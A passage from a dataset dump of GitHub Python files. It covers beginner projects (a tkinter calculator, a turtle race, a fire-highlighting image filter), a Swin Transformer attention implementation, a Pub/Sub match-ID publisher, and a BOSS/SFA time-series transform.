roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press('/'))\nbuttonclear=tk.Button(master=buttonframe, text='C',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:clear())\nbuttonequal=tk.Button(master=buttonframe, text='=',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=17,height=3,command=lambda:equalpress())\nbuttonbs=tk.Button(master=buttonframe, text='<-',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:backspace())\nbuttonans=tk.Button(master=buttonframe, text='Ans',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(ans))\n\nbuttonframe.pack()\nentrybox.grid(row=0,column=0,columnspan=4,pady=15,ipadx=8,ipady=25)\nbutton1.grid(row=1,column=0)\nbutton2.grid(row=1,column=1)\nbutton3.grid(row=1,column=2)\nbuttonplus.grid(row=1,column=3)\nbutton4.grid(row=2,column=0)\nbutton5.grid(row=2,column=1)\nbutton6.grid(row=2,column=2)\nbuttonminus.grid(row=2,column=3)\nbutton7.grid(row=3,column=0)\nbutton8.grid(row=3,column=1)\nbutton9.grid(row=3,column=2)\nbuttonmult.grid(row=3,column=3)\nbuttonpoint.grid(row=4,column=0)\nbutton0.grid(row=4,column=1)\nbuttonclear.grid(row=4,column=2)\nbuttondiv.grid(row=4,column=3)\nbuttonbs.grid(row=5,column=3)\nbuttonans.grid(row=5,column=2)\nbuttonequal.grid(row=5,column=0,columnspan=2)\n\n\n\nwindow.mainloop()\n","repo_name":"kelvindoe22/Python_beginner_projects","sub_path":"calc2.py","file_name":"calc2.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"24138117015","text":"import glob\nimport PyPDF2 as pdf\nimport datetime\nimport pandas as pd\n\ncsvName = input('Enter csv file name: ')\n\ndt = datetime.datetime.now()\nfileN = dt.strftime('%Y%m%d_%H%M%S') + 'csvOf.pdf'\n\nd = pd.read_csv('./data/' + csvName, header=None)\n\nwriter = pdf.PdfWriter()\nfiles = glob.glob('./data/*.pdf')\n\nfor i in range(len(files)):\n reader = pdf.PdfReader(files[i])\n\n for l in range(0, len(reader.pages)):\n if (l+1) in d.values:\n page = reader.pages[l]\n writer.add_page(page)\n \nwith open(fileN, 'wb') as f:\n writer.write(f)\n \n","repo_name":"ducksfrogs/ICTuse","sub_path":"pdf_printPJ/printCSVinput.py","file_name":"printCSVinput.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30374284915","text":"import glob\nimport importlib\nimport inspect\nimport logging\nimport re\nimport scandir\nimport pathlib\n\nimport click\n\nfrom collections import defaultdict\nfrom os import path\nfrom typing import Callable, Generator\n\nlogger = logging.getLogger(__name__)\n\n\nPY_FILE_REGEXP = re.compile(r'[a-z_]\\w*.py$')\nPY_FILE_PUBLIC = re.compile(r'[a-z]\\w*.py$') # only \"public modules\" here\n\n\ndef function_args(func: Callable) -> dict:\n args = inspect.getargspec(func)\n return dict(args._asdict())\n\n\ndef _is_public_function(func: Callable) -> bool:\n return inspect.isfunction(func) and not func.__name__.startswith('_')\n\n\ndef public_interface(module):\n return inspect.getmembers(module, predicate=_is_public_function)\n\n\ndef module_transform(full: str, root: str) -> str:\n rel = pathlib.Path(full).relative_to(root)\n return str(rel).replace('/', '.')[:-3]\n\n\ndef modules(pth: str, skip_tests: bool=True) -> Generator:\n for root, dirs, files in scandir.walk(pth):\n if not skip_tests or 'tests' not in root:\n py_files = filter(lambda v: PY_FILE_PUBLIC.match(v), files)\n for py in py_files:\n print(path.join(root, py))\n yield module_transform(path.join(root, py), pth)\n\n\ndef functions(mod_path: str, root: str) -> Generator:\n mod = module_transform(mod_path, root)\n mod_obj = importlib.import_module(mod)\n return [x[0] for x in public_interface(mod_obj)]\n\n\n@click.group()\n@click.pass_context\ndef cli(ctx):\n logging.basicConfig()\n logging.getLogger().setLevel(logging.DEBUG)\n\n\n@cli.command(help='report analysis')\n@click.argument('path')\n@click.pass_context\ndef report(ctx, path):\n # list of things to report that actually define a package\n # - modules\n # - functions\n # - variables\n from pprint import pprint\n","repo_name":"AndreaCrotti/breaking-changes","sub_path":"breaking_changes/inspector.py","file_name":"inspector.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39638607318","text":"import MySQLdb\nimport torch\nfrom torch import nn\nimport einops\nimport numpy as np\nimport torch.nn.functional as F\nfrom timm.models.layers import DropPath, to_2tuple, trunc_normal_\n\n'''\nswin transformer\n1. 设计W-MSA, W-MSA 每个窗口进行独立运算\n2. 设计SW-MSA, 对图形进行移动,分割出不同窗口, 加强窗口交互\n3. SwinTransformerBlock, 成对使用W-MSA和SW-MSA\n4. Patch Merging进行下采样\n5. 充分考虑到位移不变性, 尺寸不变性, 层次变深感受野越大等特性\n\n思考: 考虑到cnn学习表征,较小感受野, transformer学习更深层次的特征,全局感受野\n在浅层网络使用cnn,深层使用transformer\n4 stages, 多个stage融合? res add blocks focus fpn partial conv\n'''\n\n# reference: https://arxiv.org/pdf/2103.14030v2.pdf\n# Modify from https://github.com/microsoft/Swin-Transformer/blob/main/models/swin_transformer_v2.py\n'''\n 1. 对swintransformerBlock 进行修改, 增加残差和采样优化计算量, \n 2. 对blocks进行特征对齐和融合\n'''\n\n\n# tool function\ndef window_partition(x, window_size):\n '''\n 将输入图像切成窗口大小\n :param x: [b, h, w, c]\n :param window_size: window size int\n :return: [(b*h*w) window_size window_size c]\n '''\n B, H, W, C = x.shape\n x = einops.rearrange(x, 'b (h s1) (w s2) c -> b h s1 w s2 c', s1=window_size, s2=window_size)\n windows = einops.rearrange(x, 'b h s1 w s2 c -> b h w s1 s2 c')\n windows = einops.rearrange(windows, 'b h w s1 s2 c -> (b h w) s1 s2 c')\n return windows\n\ndef window_partition_official(x, window_size):\n \"\"\"\n Args:\n x: (B, H, W, C)\n window_size (int): window size\n\n Returns:\n windows: (num_windows*B, window_size, window_size, C)\n \"\"\"\n B, H, W, C = x.shape\n x = x.view(B, H // window_size, window_size, W // window_size, window_size, C)\n windows = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(-1, window_size, window_size, C)\n return windows\n\ndef window_reverse(windows, window_size, h, w):\n '''\n 从窗口恢复成图形格式\n :param windows: (num_windows*b, window_size, window_size, c)\n :param window_size: int\n :param h: height of img\n :param w: width of img\n :return: [b h w c]\n '''\n b = int(windows.shape[0] / (h * w / window_size / window_size))\n x = einops.rearrange(windows, '(b h w) s1 s2 c -> b h w s1 s2 c', b=int(b), s1=window_size, s2=window_size, w=w//window_size, h=h//window_size)\n x = einops.rearrange(x, 'b h w s1 s2 c -> b (h s1) (w s2) c')\n return x\n\ndef window_reverse_offcial(windows, window_size, H, W):\n \"\"\"\n Args:\n windows: (num_windows*B, window_size, window_size, C)\n window_size (int): Window size\n H (int): Height of image\n W (int): Width of image\n\n Returns:\n x: (B, H, W, C)\n \"\"\"\n B = int(windows.shape[0] / (H * W / window_size / window_size))\n x = windows.view(B, H // window_size, W // window_size, window_size, window_size, -1)\n x = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(B, H, W, -1)\n return x\n\n\nclass FeedForward(nn.Module):\n def __init__(self, in_channel, out_channel, hidden_dim, dropout=0.0):\n super(FeedForward, self).__init__()\n self.fc1 = nn.Linear(in_channel, hidden_dim)\n self.act = nn.GELU()\n self.fc2 = nn.Linear(hidden_dim, out_channel)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.dropout(x)\n x = self.fc2(x)\n x = self.dropout(x)\n return x\n\n\nclass PatchMerge(nn.Module):\n '''\n 作用类似于采样, 缩小分辨率\n 相比于max_pool + conv 组合,保留更多信息\n --> yolov5 中 focus层也是类似的操作\n '''\n def __init__(self, in_channel, img_size):\n super(PatchMerge, self).__init__()\n self.img_h, self.img_w = img_size\n self.in_channel = in_channel\n\n self.reduction = nn.Linear(4 * in_channel, 2 * in_channel, bias=False)\n self.norm = nn.LayerNorm(2 * in_channel)\n\n def forward(self, x):\n '''\n :param x: [b,h * w, c]\n :return: [b, l, -]\n '''\n B, L, C = x.shape\n assert L == self.img_h * self.img_h, f'x shape{x.shape} not match'\n assert self.img_h % 2 == 0 and self.img_w % 2 == 0, f'img size should be even'\n\n x = einops.rearrange(x, 'b (h w) c -> b h w c', h=self.img_h, w=self.img_w)\n x_0 = x[:, 0::2, 0::2, :]\n x_1 = x[:, 1::2, 0::2, :]\n x_2 = x[:, 0::2, 1::2, :]\n x_3 = x[:, 1::2, 1::2, :]\n x = torch.cat([x_0, x_1, x_2, x_3], -1)\n x = einops.rearrange(x, 'b h w c-> b (h w) c', c=C * 4)\n x = self.reduction(x)\n x = self.norm(x)\n\n return x\n\nclass PatchEmbed(nn.Module):\n def __init__(self, in_channel, embed_dim=96, img_size=224, patch_size=4):\n img_size = to_2tuple(img_size)\n patch_size = to_2tuple(patch_size)\n patches_resolution = [img_size[0] // patch_size[0], img_size[1] // patch_size[1]]\n self.img_size = img_size\n self.patch_size = patch_size\n self.patch_resolution = patches_resolution\n self.num_pathch = patches_resolution[0] * patches_resolution[1]\n\n self.in_channel = in_channel\n self.embed_dim = embed_dim\n\n self.proj = nn.Conv2d(in_channel, embed_dim,kernel_size=patch_size, stride=patch_size)\n self.norm_layer = nn.LayerNorm(embed_dim)\n\n def forward(self, x):\n B, C, H, W = x.shape\n assert H == self.img_size[0] and W == self.img_size[1]\n x = self.proj(x).flatten(2).transpose(1, 2) # [b, ph*pw, c]\n x = self.norm_layer(x)\n\n return x\n\n\nclass WindowAttentionV2(nn.Module):\n '''\n W-MSA, 使用相对位置编码, 基于的就是MHA\n '''\n def __init__(self, in_channel, window_size, num_heads, qkv_bias=True, attn_drop=0.0, proj_drop=0.0, pretrain_window_size=[0, 0]):\n super(WindowAttentionV2, self).__init__()\n self.in_channel = in_channel\n self.img_h, self.img_w = window_size # (window_h, window_w)\n self.window_size = window_size\n self.num_heads = num_heads\n self.head_dim = in_channel // num_heads\n self.scale = self.head_dim ** -0.5\n\n # relative position part\n # copy from https://github.com/microsoft/Swin-Transformer/blob/main/models/swin_transformer_v2.py#L113\n self.logit_scale = nn.Parameter(torch.log(10 * torch.ones((num_heads, 1, 1))), requires_grad=True)\n # relative position bias\n self.position_bias = nn.Sequential(\n nn.Linear(2, 512, bias=True),\n nn.ReLU(inplace=True),\n nn.Linear(512, num_heads, bias=False)\n )\n\n # relative_coords_table\n relative_coords_h = torch.arange(-(self.window_size[0] - 1), self.window_size[0], dtype=torch.float32)\n relative_coords_w = torch.arange(-(self.window_size[1] - 1), self.window_size[1], dtype=torch.float32)\n\n relative_coords_table = torch.stack(\n torch.meshgrid(\n [relative_coords_h, relative_coords_w]\n )\n ).permute(1, 2, 0).contiguous().unsqueeze(0) #-> [1, 2*win_h-1, 2*win_w-1, 2]\n\n if pretrain_window_size[0] > 0:\n relative_coords_table[:, :, :, 0] /= (pretrain_window_size[0] - 1)\n relative_coords_table[:, :, :, 1] /= (pretrain_window_size[1] - 1)\n else:\n relative_coords_table[:, :, :, 0] /= (self.window_size[0] - 1)\n relative_coords_table[:, :, :, 1] /= (self.window_size[1] - 1)\n relative_coords_table = torch.sign(relative_coords_table) * torch.log2(\n torch.abs(relative_coords_table) + 1.0) / np.log2(8)\n self.register_buffer(\"relative_coords_table\", relative_coords_table)\n\n # pair-wise relative postion index for each inside the windows\n\n coords_h = torch.arange(self.window_size[0])\n coords_w = torch.arange(self.window_size[1])\n coords = torch.stack(torch.meshgrid([\n coords_h, coords_w\n ]))\n coords_flatten = torch.flatten(coords, 1) # [2, win_h*win_w]\n relative_coords = coords_flatten[:, :, None] - coords_flatten[:, None, :] #[2, win_h*win_w, win_h* win_w]\n relative_coords = relative_coords.permute(1, 2, 0).contiguous()\n relative_coords[:, :, 0] += self.window_size[0] - 1\n relative_coords[:, :, 1] += self.window_size[1] - 1\n relative_coords[:, :, 0] *= 2 * self.window_size[1] - 1\n relative_position_index = relative_coords.sum(-1)\n self.register_buffer(\"relative_position_index\", relative_position_index)\n\n self.to_qkv = nn.Linear(in_channel, in_channel*3, bias=False)\n if qkv_bias:\n self.q_bias = nn.Parameter(torch.zeros(in_channel))\n self.v_bias = nn.Parameter(torch.zeros(in_channel))\n else:\n self.q_bias = None\n self.v_bias = None\n\n self.attn_drop = attn_drop\n self.proj_drop = proj_drop\n\n self.attn = nn.Softmax(dim=-1)\n self.proj = nn.Linear(in_channel, in_channel)\n\n def forward(self, x, mask=None):\n '''\n mask: (0/-inf) mask with shape of [num_windows, wh*ww, wh*ww]\n :param x: input feature [num_win*b, n, c]\n :return:\n '''\n B, N, C = x.shape\n if self.q_bias is not None:\n qkv_bias = torch.cat([self.q_bias, torch.zeros_like(self.v_bias, requires_grad=False), self.v_bias])\n\n qkv = F.linear(input=x, weight=self.to_qkv.weight, bias=qkv_bias)\n qkv = qkv.reshape(B, N, 3, self.num_heads, -1).permute(2, 0, 3, 1, 4)\n q, k, v = qkv[0], qkv[1], qkv[2]\n\n attn = torch.matmul((F.normalize(q, dim=-1)), F.normalize(k, dim=-1).transpose(-2, -1))\n\n\n\n\n print(f'q shape: {q.shape}')\n print(f'k shape: {k.shape}')\n print(f'v shape: {v.shape}')\n\n return qkv\n\n\nclass WindowAttention(nn.Module):\n '''\n 原本的实现\n copy from https://github.com/microsoft/Swin-Transformer/blob/main/models/swin_transformer.py\n '''\n def __init__(self, in_channel, window_size, num_heads, qkv_bias=True, attn_drop=0.0, proj_drop=0.0):\n super(WindowAttention, self).__init__()\n self.in_channel = in_channel\n self.window_size = window_size\n self.img_h, self.img_w = window_size\n self.num_heads = num_heads\n head_dim = in_channel // num_heads\n self.scale = head_dim ** -0.5\n\n # relative position bias parameter table\n self.relative_position_bias_table = nn.Parameter(\n torch.zeros((2 * window_size[0] - 1) * (2 * window_size[1] -1), num_heads)\n ) # [2*Wh - 1, 2*Ww - 1, num_heads]\n\n # pair-wise relative position index for each token inside the window\n coords_h = torch.arange(self.window_size[0])\n coords_w = torch.arange(self.window_size[1])\n coords = torch.stack(torch.meshgrid([coords_h, coords_w])) # [1, Wh, Ww]\n coords_flatten = torch.flatten(coords, 1) # [2, Wh*Ww]\n relative_coords = coords_flatten[:, :, None] - coords_flatten[:, None, :] #[2, Wh*Ww]\n relative_coords[:, :, 0] += self.window_size[0] - 1\n relative_coords[:, :, 1] += self.window_size[1] - 1\n relative_coords[:, :, 0] *= 2 * self.window_size[1] - 1\n self.relative_position_index = relative_coords.sum(-1) # [Wh*Ww, Wh*Ww]\n self.register_buffer(\"relative_position_index\", self.relative_position_index)\n\n self.to_qvk = nn.Linear(in_channel, in_channel * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(in_channel, in_channel)\n self.proj_drop = nn.Dropout(proj_drop)\n\n trunc_normal_(self.relative_position_bias_table, std=0.02)\n self.attn = nn.Softmax(dim=-1)\n\n def forward(self, x, mask=None):\n '''\n\n :param x: [num_windows*B, N, C]\n :param mask: (num_windows, Wh*Ww, Wh*Ww) or None\n :return:\n '''\n\n B, N, C = x.shape\n qkv = self.to_qvk(x).chunk(3, dim=-1)\n qkv = einops.rearrange(qkv, 'b n (c2 c1 nh) -> b n c1 nh c2', c1=3, c2=C//self.num_heads, nh=self.num_heads)\n #q, k, v = map(lambda t: einops.rearrange(t, 'b n (c nh) -> b n c nh', nh=self.num_heads), qkv)\n q, k, v = qkv[0], qkv[1], qkv[2]\n dot = torch.matmul(q, k.transpose(-2, -1)) * self.scale\n\n relative_position_bias = self.relative_position_bias_table[self.relative_position_index.view(-1)].view(\n self.window_size[0] * self.window_size[1], self.window_size[0] * self.window_size[1], -1\n )\n relative_position_bias = einops.rearrange(relative_position_bias, 'hw1 hw2 nh -> nh hw1 hw2').contiguous()\n dot = dot + relative_position_bias.unsqueeze(0)\n '''\n attn = softmax(q·k.T/sqrt(d) + b)·v\n '''\n\n if mask is not None:\n # [num_windows, Wh * Ww, Wh * Ww]\n nW = mask.shape[0]\n # dot = einops.rearrange(dot, '(b nw) nw nh')\n dot = dot.view(B // nW, nW, self.num_heads, N, N) + mask.unsqueeze(1).unsqueeze(0)\n dot = dot.view(-1, self.num_heads, N, N)\n attn = self.attn(dot)\n else:\n attn = self.attn(dot)\n\n attn = self.attn_drop(attn)\n attn = torch.matmul(attn, v).transpose(1, 2).reshape(B, N, C)\n attn = self.proj(attn)\n attn = self.proj_drop(attn)\n return attn\n\nclass SwinTransformerBlock(nn.Module):\n def __init__(self, in_channel, img_size, num_heads, window_size=7,\n shift_size=0, expan_ration=4, qkv_bias=True, qk_scale=None,\n dropout=0.0, attn_drop=0.0, drop_path=0.0):\n super(SwinTransformerBlock, self).__init__()\n self.in_channel = in_channel\n self.img_size = img_size\n self.num_heads = num_heads\n self.shift_size = shift_size\n self.expan_ration = expan_ration\n self.window_size=window_size\n if min(self.img_size) <= self.window_size:\n self.shift_size = 0\n self.window_size = min(self.img_size)\n\n self.norm = nn.LayerNorm(in_channel)\n '''\n def __init__(self, in_channel, window_size, num_heads, qkv_bias=True, attn_drop=0.0, proj_drop=0.0):\n '''\n self.attn = WindowAttention(\n in_channel=in_channel,\n window_size=to_2tuple(window_size),\n num_heads=num_heads,\n qkv_bias=qkv_bias,\n attn_drop=attn_drop,\n proj_drop=dropout\n )\n\n self.drop_path = DropPath(drop_path)\n hidden_dim = int(in_channel * expan_ration)\n self.ffn = FeedForward(in_channel=in_channel, out_channel=in_channel,hidden_dim=hidden_dim)\n\n if self.shift_size > 0:\n img_h, img_w = self.img_size\n img_mask = torch.zeros((1, img_h, img_w, 1))\n h_slices = (slice(0, -self.window_size),\n slice(-self.window_size, -self.shift_size),\n slice(-self.shift_size, None)\n )\n w_slices = (slice(0, -self.window_size),\n slice(-self.window_size, -self.shift_size),\n slice(-self.shift_size, None)\n )\n\n cnt = 0\n for h in h_slices:\n for w in w_slices:\n img_mask[:, h, w, :] = cnt\n cnt += 1\n\n mask_windows = window_partition(img_mask, self.window_size) # [nW, window_size, window_size, 1]\n mask_windows = mask_windows.view(-1, self.window_size * self.window_size)\n attn_mask = mask_windows.unsqueeze(1) - mask_windows.unsqueeze(2)\n self.attn_mask = attn_mask.masked_fill(attn_mask !=0, float(-100.0)).mased_fill(attn_mask == 0, float(0.0))\n\n else:\n self.attn_mask = None\n\n self.register_buffer(\"attn_mask\", attn_mask)\n\n def forward(self, x):\n H, W = self.img_size\n B, L, C = x.shape\n assert L == H * W, \"input feature has wrong size\"\n res = x\n x = self.norm(x)\n x = einops.rearrange(x, 'b (h w) c -> b h w c', h=H, w=W)\n\n # cyclic shift -> 个人认为是swin transformer 最精华的部分\n # 很好的利用了平移不变性,并且考虑到不同窗口的交流\n # 但是这个方法的泛化能力还是稍差, 需要大量的数据才能实现\n if self.shift_size > 0:\n shifted_x = torch.roll(x, shifts=(-self.shift_size, -self.shift_size), dims=(1, 2))\n x_windows = window_partition(shifted_x, self.window_size) # [nW*B, window_size, window_size, C]\n else:\n shifted_x = x\n # partition windows\n x_windows = window_partition(shifted_x, self.window_size)\n # return [nW*B, window_size, window_size, C]\n\n x_windows = einops.rearrange(x_windows, \"wb ws1 ws2 c -> wb (ws1 ws2) c\")\n\n # attn\n attn_windows = self.attn(x_windows, mask=self.attn_mask)\n\n # merge\n attn_windows = attn_windows.view(-1, self.window_size, self.window_size, C)\n\n # reverse cyclic shift\n if self.shift_size > 0:\n shifted_x = window_reverse(attn_windows, self.window_size, H, W)\n x = torch.roll(shifted_x, shifts=(self.shift_size, self.shift_size), dim=(1, 2))\n\n else:\n shifted_x = window_reverse(attn_windows, self.window_size, H, W)\n x = shifted_x\n # [B H' W' C]\n\n x = einops.rearrange(x, 'b h w c -> b (h w) c')\n x = res + self.drop_path(x)\n\n #ffn\n x = x + self.drop_path(self.ffn(self.norm(x)))\n\n return x\n\n\n\nif __name__ == '__main__':\n\n x = torch.randn(1, 3, 54, 54)\n x = einops.rearrange(x, 'b c w h -> b (w h) c')\n patch_merging = PatchMerge(3, (54, 54))\n patch_merging_test = patch_merging(x)\n print(f'patch_merging_test: {patch_merging_test.shape}')\n\n ffn = FeedForward(3, 64, 32)\n ffn_test = ffn(x)\n print(f'ffn_test: {ffn_test.shape}')\n\n x_1 = torch.randn(1, 3, 54, 54)\n x_1 = einops.rearrange(x_1, \"b c w h -> b w h c\")\n window_partition_test = window_partition(x_1, 9)\n print(f'window_partition_test: {window_partition_test.shape}')\n\n window_reverse_test = window_reverse(window_partition_test, 9, 54, 54)\n print(f'after window_reverse: {window_reverse_test.shape}')\n y_2 = window_partition_test\n # def __init__(self, in_channel, window_size, num_heads, qkv_bias=True, attn_drop=0.0, proj_drop=0.0, mask=None, pretrain_window_size=[0, 0]):\n\n to_three_dim = nn.Linear(4, 12, bias=False)\n x = torch.randn(1, 64, 4)\n to_three_dim_test = to_three_dim(x)\n print(f'x shape {x.shape}')\n print(f'after to_qvk: {to_three_dim_test.shape}')","repo_name":"Qiaoqi-Zhuyan/transformers-units","sub_path":"attention/swin_transformer.py","file_name":"swin_transformer.py","file_ext":"py","file_size_in_byte":18743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20315094542","text":"import logging, sys\n\nfrom library.constants import DATA_ROOT, LOG_ROOT, PROJECT_ID, TOPIC_NAME\nfrom google.cloud import pubsub_v1\n\nlogging.basicConfig(filename=LOG_ROOT+'unique_extractor.log', level=logging.DEBUG, format='%(levelname)s:%(asctime)s %(message)s')\n\nmatch_list = set()\n\n# Command line arguement - fetch the matchID to process\nfileName = sys.argv[1]\n\npublisher = pubsub_v1.PublisherClient()\ntopic_path = publisher.topic_path(PROJECT_ID, TOPIC_NAME + '-new')\n\nfutures = dict()\n\nts = sys.argv[1]\n\nlogging.info(f'Process ID: {ts}: Extracting unique values')\n\nwith open(DATA_ROOT + 'serial_matches_' + fileName + '.log') as f:\n match_list = f.readlines()\n\nmatch_list = list(filter(None, [v.rstrip() for v in match_list]))\nmatch_list = set(match_list)\n\nwith open(DATA_ROOT + f'unique_serial_matches.log', \"a\") as f:\n for item in match_list:\n try:\n f.write(\"%s\\n\" % item)\n data = item\n publisher.publish(topic_path, data=data.encode('utf-8'))\n logging.info(f'Process ID: {ts}: Published message {str(item)} to queue')\n except Exception as e:\n logging.error(f'Error occurred {str(e)}, adding remaining match ids to original file')\n with open(DATA_ROOT + 'serial_matches_failed_transactions.log', 'a') as t:\n t.write(\"%s\\n\" % item)\n logging.debug(f'Added match id to the serial_matches_failed_transactions.log')\n\nlogging.info(f'Process ID: {ts}: Process completed successfully.')\n","repo_name":"bhaargav006/dota-pipeline","sub_path":"data_dump/unique_extractor.py","file_name":"unique_extractor.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"41736906708","text":"\"\"\"\nFile: fire.py\n---------------------------------\nThis file contains a method called\nhighlight_fires which detects the\npixels that are recognized as fire\nand highlights them for better observation.\n\"\"\"\nfrom simpleimage import SimpleImage\n\n\nHURDLE_FACTOR = 1.05\n\n\ndef highlight_fires(filename):\n \"\"\"\n :param filename: str, the file path of the original image.\n :return: the img that highlight the fire area and darken others.\n \"\"\"\n img = SimpleImage(filename)\n for pixel in img:\n avg = (pixel.red + pixel.blue + pixel.green) // 3\n if pixel.red > avg * HURDLE_FACTOR:\n pixel.red = 255\n pixel.blue = 0\n pixel.green = 0\n else:\n pixel.red = avg\n pixel.blue = avg\n pixel.green = avg\n return img\n\n\ndef main():\n \"\"\"\n This program shows highlight the fire area in the picture.\n \"\"\"\n original_fire = SimpleImage('images/greenland-fire.png')\n original_fire.show()\n highlighted_fire = highlight_fires('images/greenland-fire.png')\n highlighted_fire.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Rita-Ning/sc-turing","sub_path":"stanCode-Project/my photoshop/fire.py","file_name":"fire.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"511984208","text":"from pcsmobile.handle.wsgi._base import _BaseHandler\nfrom util.constants import Constants\nfrom util.fetch import Fetcher\nfrom util.render import Renderer\n\nfrom util.TimeZone import current_time\nfrom util.TimeZone import from_isostring\n\nclass _BaseChooseHandler (_BaseHandler):\n def __init__(self):\n super(_BaseChooseHandler, self).__init__()\n \n def _build_chooser_values(self):\n \"\"\"Get a dictionary of values that every chooser uses.\"\"\"\n values = {}\n \n values['return_url'] = self._get_param('return_url')\n values['return_param'] = self._get_param('return_param')\n values['current_value'] = self._get_param('current_value')\n \n reflect_params = [\n [arg[8:], value]\n for arg, value in self._get_params().items()\n if arg.startswith('reflect_')]\n values['reflect_params'] = reflect_params\n \n return values\n\n","repo_name":"mjumbewu/pcs-mobile","sub_path":"pcsmobile/handle/wsgi/_chooser.py","file_name":"_chooser.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"15415781336","text":"from src.transformation.SFA import *\n\n\nclass BOSS():\n\n def __init__(self, maxF, maxS, windowLength, normMean, logger = None):\n self.maxF = maxF\n self.symbols = maxS\n self.windowLength = windowLength\n self.normMean = normMean\n self.signature = None\n logger.Log(self.__dict__, level = 0)\n self.logger = logger\n\n\n def createWords(self, samples):\n if self.signature == None:\n self.signature = SFA(\"EQUI_DEPTH\", logger = self.logger)\n self.signature.fitWindowing(samples, self.windowLength, self.maxF, self.symbols, self.normMean, True)\n self.signature.printBins(self.logger)\n\n words = []\n for i in range(samples[\"Samples\"]):\n sfaWords = self.signature.transformWindowing(samples[i])\n words_small = []\n for word in sfaWords:\n words_small.append(self.createWord(word, self.maxF, int2byte(self.symbols)))\n words.append(words_small)\n\n return words\n\n\n def createWord(self, numbers, maxF, bits):\n shortsPerLong = int(round(60 / bits))\n to = min([len(numbers), maxF])\n\n b = 0\n s = 0\n shiftOffset = 1\n for i in range(s, (min(to, shortsPerLong + s))):\n shift = 1\n for j in range(bits):\n if (numbers[i] & shift) != 0:\n b |= shiftOffset\n shiftOffset <<= 1\n shift <<= 1\n\n limit = 2147483647\n total = 2147483647 + 2147483648\n while b > limit:\n b = b - total - 1\n return b\n\n\n def createBagOfPattern(self, words, samples, f):\n bagOfPatterns = [BagOfBigrams(samples[j].label) for j in range(samples[\"Samples\"])]\n # bagOfPatterns = []\n usedBits = int2byte(self.symbols)\n mask = (1 << (usedBits * f)) - 1\n\n for j in range(len(words)):\n BOP = {}\n lastWord = -9223372036854775808\n for offset in range(len(words[j])):\n word = words[j][offset] & mask\n if word != lastWord:\n if word in BOP.keys():\n BOP[word] += 1\n else:\n BOP[word] = 1\n lastWord = word\n bagOfPatterns[j].bob = BOP\n return bagOfPatterns\n\n\n def int2byte(self, number):\n log = 0\n if (number & 0xffff0000) != 0:\n number >>= 16\n log = 16\n if number >= 256:\n number >>= 8\n log += 8\n if number >= 16:\n number >>= 4\n log += 4\n if number >= 4:\n number >>= 2\n log += 2\n return log + (number >> 1)\n\n\n def bag2dict(self, bag):\n bag_dict = []\n for list in bag:\n new_dict = {}\n for element in list:\n if element in new_dict.keys():\n new_dict[element] += 1\n else:\n new_dict[element] = 1\n bag_dict.append(new_dict)\n return bag_dict\n\n\nclass BagOfBigrams():\n def __init__(self, label):\n self.bob = {}\n self.label = int(label)\n","repo_name":"sharford5/SFA_Python","sub_path":"src/transformation/BOSS.py","file_name":"BOSS.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"76"} +{"seq_id":"678188623","text":"from turtle import Turtle, Screen\nfrom random import choice, randint\n\n\n\nscreen = Screen()\nscreen.title(\"Welcome to Turtle Race!\")\nscreen.bgcolor('#ffffff')\nscreen.setup(width=500, height=400)\nuser_bet = screen.textinput(title='Make your bet', prompt='Which turtle will win the race? Enter a color: ').lower()\n# print(user_bet)\n\n\n\nfinish_line = Turtle()\nfinish_line.penup()\nfinish_line.goto(x=235, y=195)\nfinish_line.pendown()\nfinish_line.goto(x=235, y=-185)\nfinish_line.hideturtle()\n\n\ncolors = ['purple', 'blue', 'orange', 'red', 'gold', 'green']\n\n\n\ndef turtle_factory():\n nts_list = [] # ninja turtles list\n '''Creates turtles and gives them a color'''\n y = -165\n used_colors = []\n \n for i in range(len(colors)):\n tmnts = Turtle(shape='turtle') # teenage mutant ninja turtles\n tmnts.penup()\n tmnts.goto(x=-235, y=y)\n \n tmnts.color(choice(colors))\n used_colors.append(tmnts.pencolor())\n\n if tmnts.pencolor() in used_colors:\n colors.remove(tmnts.pencolor())\n\n nts_list.append(tmnts)\n y += 65 # add spacing\n return nts_list\n\nnts = turtle_factory()\n\n\n\ndef turtles_run():\n '''Prompts turtles to start the race'''\n for nt in nts:\n if nt.xcor() > finish_line.xcor():\n winner = Turtle()\n winner.penup()\n winner.hideturtle()\n winner.color(nt.pencolor())\n winner.write('The winner is ' + nt.pencolor(), align='center', font=('Arial', 25))\n\n winner.goto(x=0, y=-25)\n if user_bet == nt.pencolor():\n winner.write(\"You've guessed right!\", align='center', font=('Arial', 15))\n else:\n winner.write(\"Incorrect guess. Try again!\", align='center', font=('Arial', 15))\n\n return nt.pencolor() # returns winning color(s)\n else:\n nt.forward(randint(0, 25)) # lower the range the greater chance of a 